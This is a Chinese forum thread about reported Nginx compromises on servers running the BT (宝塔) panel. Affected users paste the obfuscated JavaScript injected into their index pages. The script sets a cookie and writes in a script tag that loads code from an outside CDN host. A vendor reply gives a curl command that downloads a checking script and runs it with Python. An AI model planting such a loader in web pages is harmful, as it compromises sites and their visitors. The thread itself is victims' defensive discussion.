【官方公告】关于外传宝塔面板或Nginx异常的公告

janzel 发表于 2022-12-9 23:14
这是中招了吗？

不是

catkin038 发表于 2022-12-10 01:21
使用这条命令
curl -sSO http://download.bt.cn/tools/w_check.py && /www/server/panel/pyenv/bin/pytho ...

建议所有用户升级到最新版宝塔面板，所以我写了依赖面板的python
如果无法执行命令的用户，先将宝塔面板升级到最新版

宝塔用户_vtykot 发表于 2022-12-10 10:22
这是真的吗？？？

赞美伟大的宝塔（雾

被改index文件，有没有办法解决？

宝塔用_6c87 发表于 2022-12-10 15:37
被改index文件，有没有办法解决？

这样的

<script>var _0xb2ce=["\x67\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x73\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x77\x61\x66\x5F\x73\x63","\x35\x38\x38\x39\x36\x34\x37\x37\x32\x36","\x25\x33\x43\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x64\x6E\x2D\x67\x6F\x2E\x6E\x65\x74\x2F\x76\x61\x73\x64\x65\x76\x2F\x77\x65\x62\x5F\x77\x65\x62\x70\x65\x72\x73\x69\x73\x74\x61\x6E\x63\x65\x5F\x76\x32\x2F\x76\x31\x2E\x38\x2E\x32\x2F\x66\x6C\x6F\x67\x2E\x63\x6F\x72\x65\x2E\x6D\x69\x6E\x2E\x6A\x73\x27\x25\x33\x45\x25\x33\x43\x2F\x73\x63\x72\x69\x70\x74\x25\x33\x45","\x77\x72\x69\x74\x65"];function setc(_0x808ax2,_0x808ax3,_0x808ax4){var _0x808ax5= new Date();_0x808ax5[_0xb2ce[1]](_0x808ax5[_0xb2ce[0]]()+ _0x808ax4);document[_0xb2ce[2]]= _0x808ax2+ _0xb2ce[3]+ _0x808ax3+ _0xb2ce[4]+ _0x808ax5[_0xb2ce[5]]()}setc(_0xb2ce[6],_0xb2ce[7],360);document[_0xb2ce[9]](unescape(_0xb2ce[8]));</script><html>
<head>


我的服务器也中了

<script>var _0xb2ce=["\x67\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x73\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x77\x61\x66\x5F\x73\x63","\x35\x38\x38\x39\x36\x34\x37\x37\x32\x36","\x25\x33\x43\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x64\x6E\x2D\x67\x6F\x2E\x6E\x65\x74\x2F\x76\x61\x73\x64\x65\x76\x2F\x77\x65\x62\x5F\x77\x65\x62\x70\x65\x72\x73\x69\x73\x74\x61\x6E\x63\x65\x5F\x76\x32\x2F\x76\x31\x2E\x38\x2E\x32\x2F\x66\x6C\x6F\x67\x2E\x63\x6F\x72\x65\x2E\x6D\x69\x6E\x2E\x6A\x73\x27\x25\x33\x45\x25\x33\x43\x2F\x73\x63\x72\x69\x70\x74\x25\x33\x45","\x77\x72\x69\x74\x65"];function setc(_0x808ax2,_0x808ax3,_0x808ax4){var _0x808ax5= new Date();_0x808ax5[_0xb2ce[1]](_0x808ax5[_0xb2ce[0]]()+ _0x808ax4);document[_0xb2ce[2]]= _0x808ax2+ _0xb2ce[3]+ _0x808ax3+ _0xb2ce[4]+ _0x808ax5[_0xb2ce[5]]()}setc(_0xb2ce[6],_0xb2ce[7],360);document[_0xb2ce[9]](unescape(_0xb2ce[8]));</script><html>
<head>

每次新建的网站自动挂马

宝塔用户_dfgqgm 发表于 2022-12-10 17:25
var _0xb2ce=["\x67\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x73\x65\x74\x4D\x69\x6E\x75\x74\x65\x73"," ...

加我企业微信，帮你清理

过年了  要挣钱

这样清理不是事情呀，要从根本上解决呀

一把大枪 发表于 2022-12-10 20:11
这样清理不是事情呀，要从根本上解决呀

我们继续全力跟进和协助用户排查Nginx挂马情况，直到溯源出结果。最终会更新解决方案，请相信我们

堡塔安全赤井秀一 发表于 2022-12-10 20:55
我们继续全力跟进和协助用户排查Nginx挂马情况，直到溯源出结果。最终会更新解决方案，请相信我们 ...

我之前也有服务器被黑了 我还保留着被植入的文件 可以提供点线索 看对你们有没有帮助 加这个帖子留的QQ 但是没有回应

宝塔用户_fydezo 发表于 2022-12-10 21:01
我之前也有服务器被黑了 我还保留着被植入的文件 可以提供点线索 看对你们有没有帮助 加这个帖子留的QQ  ...

我发个帖子就被宝塔删了。他们自己的演示站吧都被黑了还在说自己产品没问题。不知道他们怎么想的。

宝塔用户_xbykqn 发表于 2022-12-10 22:36
我发个帖子就被宝塔删了。他们自己的演示站吧都被黑了还在说自己产品没问题。不知道他们怎么想的。 ...

那个演示站不是谁都可以登陆进去修改页面html和内容的吗，那那里算得上被黑啊。

WordPress优化 发表于 2022-12-10 23:14
那个演示站不是谁都可以登陆进去修改页面html和内容的吗，那那里算得上被黑啊。 ...

他们也应该做加固啊

宝塔用户_xbykqn 发表于 2022-12-10 23:21
他们也应该做加固啊

人家不正在暂停和维护加固中吗